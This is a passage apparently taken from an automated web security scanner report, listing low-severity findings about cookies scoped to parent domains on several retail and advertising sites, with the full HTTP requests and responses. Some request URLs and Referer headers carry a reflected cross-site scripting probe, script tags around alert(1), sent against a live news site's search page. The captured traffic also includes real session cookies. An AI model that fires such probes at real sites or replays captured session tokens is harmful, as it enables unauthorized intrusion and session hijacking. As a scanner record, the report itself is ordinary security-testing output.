Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030890%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:50 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630917%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cDh3V6mSqM3U%2bN9D0AIqw32W81OA%3d;Domain=.homedepot.com;Path=/

10.15. http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/QuickViewService

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224000530%3a%3bC25%5fEXP%3d1360064000%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:20 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223857647%3a%3bC25%5fEXP%3d1360063857%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; s_pers=%20s_campaign%3Dno%2520value%7C1308225660593%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225660601%3B%20p_30%3DSubcategory%7C1308225660607%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B

Response

10.16. http://www.ilslaunch.com/skyterra-1-mission-control previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ilslaunch.com
Path:	/skyterra-1-mission-control

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS8d393e05f9096e5159d3f1d85acb4aa2=663g8gh6rfesig5han0apvb014; expires=Sat, 09 Jul 2011 14:24:11 GMT; path=/; domain=.ilslaunch.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /skyterra-1-mission-control HTTP/1.1
Host: www.ilslaunch.com
Proxy-Connection: keep-alive
Referer: http://www.lightsquared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 16 Jun 2011 10:50:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS8d393e05f9096e5159d3f1d85acb4aa2=663g8gh6rfesig5han0apvb014; expires=Sat, 09 Jul 2011 14:24:11 GMT; path=/; domain=.ilslaunch.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 16 Jun 2011 10:50:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www.ilslaunch.com/mission-control/mission-skyterra-1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

10.17. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:05:38 GMT; path=/; domain=c3metrics.com
480-VT=adver_06-16-2011-12-05-38_7521471101308225938; expires=Tue, 14-Jun-2016 12:05:38 GMT; path=/; domain=c3metrics.com
480-nUID=adver_7521471101308225938; expires=Thu, 16-Jun-2011 12:20:38 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

10.18. http://a.amxdt.com/px/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.amxdt.com
Path:	/px/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cookieid=143e8f5d019e131479f1a63b15b4928070498;Domain=.amxdt.com;Expires=Sat, 16-Jun-2012 10:39:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px/?id=803 HTTP/1.1
Host: a.amxdt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Date: Fri, 17 Jun 2011 10:39:50 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://ad.yieldmanager.com/pixel?id=1345461&t=2
P3P: policyref="/w3c/p3p.xml", CP="COM DEM INT NAV OTC PRE PUR STA UNI NOI CUR OUR BUS"
Pragma: no-cache
Server: Jetty(6.1.21RC0)
Set-Cookie: cookieid=143e8f5d019e131479f1a63b15b4928070498;Domain=.amxdt.com;Expires=Sat, 16-Jun-2012 10:39:50 GMT
X-Content-Type-Options: nosniff
Content-Length: 0
Connection: keep-alive

10.19. http://a.rfihub.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
j1=1CAESEA0pzwV4-SdN2wuhHcO4rdI;Path=/;Domain=.rfihub.com
t=1308305520137;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
u="aABrH4vzA==AI89bBrQ==AAABMJ0V9gk=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:00 GMT;Max-Age=47347200
a=c615022824147045895;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
j=c615022824147045895;Path=/;Domain=.rfihub.com
o=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
p=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com
r=1305209924560;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?id=CAESEA0pzwV4-SdN2wuhHcO4rdI&cver=1&forward= HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: g="aACtavFTw==BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAMJUePFA==AFd1504AB1AAABMJ0V31c=AFv3788AB1AAABMJ0V31c=AGu23252AB1AAABMJ0V31c=AGt23252AB1AAABMJ0V31c=AGb19789AB1AAABMJ0V31c=AGa19789AB1AAABMJ0V31c=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC9ii3_w==AE9479AN1294103956000AAABMJ0V31c=AE8438AN1275963655000AAABMJ0V31c="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABrHqp5A==AI89bBrQ==AAABMJ0V31c="; f="aADeAeSEw==AK1308305514AB1AAABMJ0V31c=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cl

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: j1=1CAESEA0pzwV4-SdN2wuhHcO4rdI;Path=/;Domain=.rfihub.com
Set-Cookie: t=1308305520137;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
Set-Cookie: u="aABrH4vzA==AI89bBrQ==AAABMJ0V9gk=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:00 GMT;Max-Age=47347200
Set-Cookie: e=cl;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:00 GMT
Set-Cookie: a=c615022824147045895;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
Set-Cookie: j=c615022824147045895;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
Set-Cookie: p=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com
Set-Cookie: r=1305209924560;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:00 GMT
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.20. http://a.rfihub.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/cm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

a2=7226644042610287825;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
j2=7226644042610287825;Path=/;Domain=.rfihub.com
t1=1308305522310;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
u="aABrI-S9g==AI89bBrQ==AAABMJ0V_oc=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT;Max-Age=47347200
a=c615022824147045895;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
j=c615022824147045895;Path=/;Domain=.rfihub.com
o=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
p=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com
r=1305209924560;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=7226644042610287825&forward= HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: g="aACtavFTw==BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAMJUePFA==AFd1504AB1AAABMJ0V31c=AFv3788AB1AAABMJ0V31c=AGu23252AB1AAABMJ0V31c=AGt23252AB1AAABMJ0V31c=AGb19789AB1AAABMJ0V31c=AGa19789AB1AAABMJ0V31c=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC9ii3_w==AE9479AN1294103956000AAABMJ0V31c=AE8438AN1275963655000AAABMJ0V31c="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABrHqp5A==AI89bBrQ==AAABMJ0V31c="; f="aADeAeSEw==AK1308305514AB1AAABMJ0V31c=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cl

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: a2=7226644042610287825;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: j2=7226644042610287825;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1308305522310;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
Set-Cookie: u="aABrI-S9g==AI89bBrQ==AAABMJ0V_oc=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT;Max-Age=47347200
Set-Cookie: e=cl;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:02 GMT
Set-Cookie: a=c615022824147045895;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
Set-Cookie: j=c615022824147045895;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
Set-Cookie: p=1-emLGD8YOQiy1;Path=/;Domain=.rfihub.com
Set-Cookie: r=1305209924560;Path=/;Domain=.rfihub.com;Expires=Thu, 12-Jun-2031 10:12:02 GMT
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.21. http://a.rfihub.com/sed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

g="aADDdMBBg==BCaXVrKKr3qCt76|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V4HA=BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
u="aABrHtwfA==AI89bBrQ==AAABMJ0V4HA=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
c="aAMAMJ_Rg==AFd1504AB2AAABMJ0V4HA=AFv3788AB2AAABMJ0V4HA=AGu23252AB2AAABMJ0V4HA=AGt23252AB2AAABMJ0V4HA=AGb19789AB2AAABMJ0V4HA=AGa19789AB2AAABMJ0V4HA=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
f="aADF8vybA==AK1308305514AB2AAABMJ0V4HA=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
s="aAC0rUkZw==AE9479AN1294103956000AAABMJ0V4HA=AE8438AN1275963655000AAABMJ0V31c=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
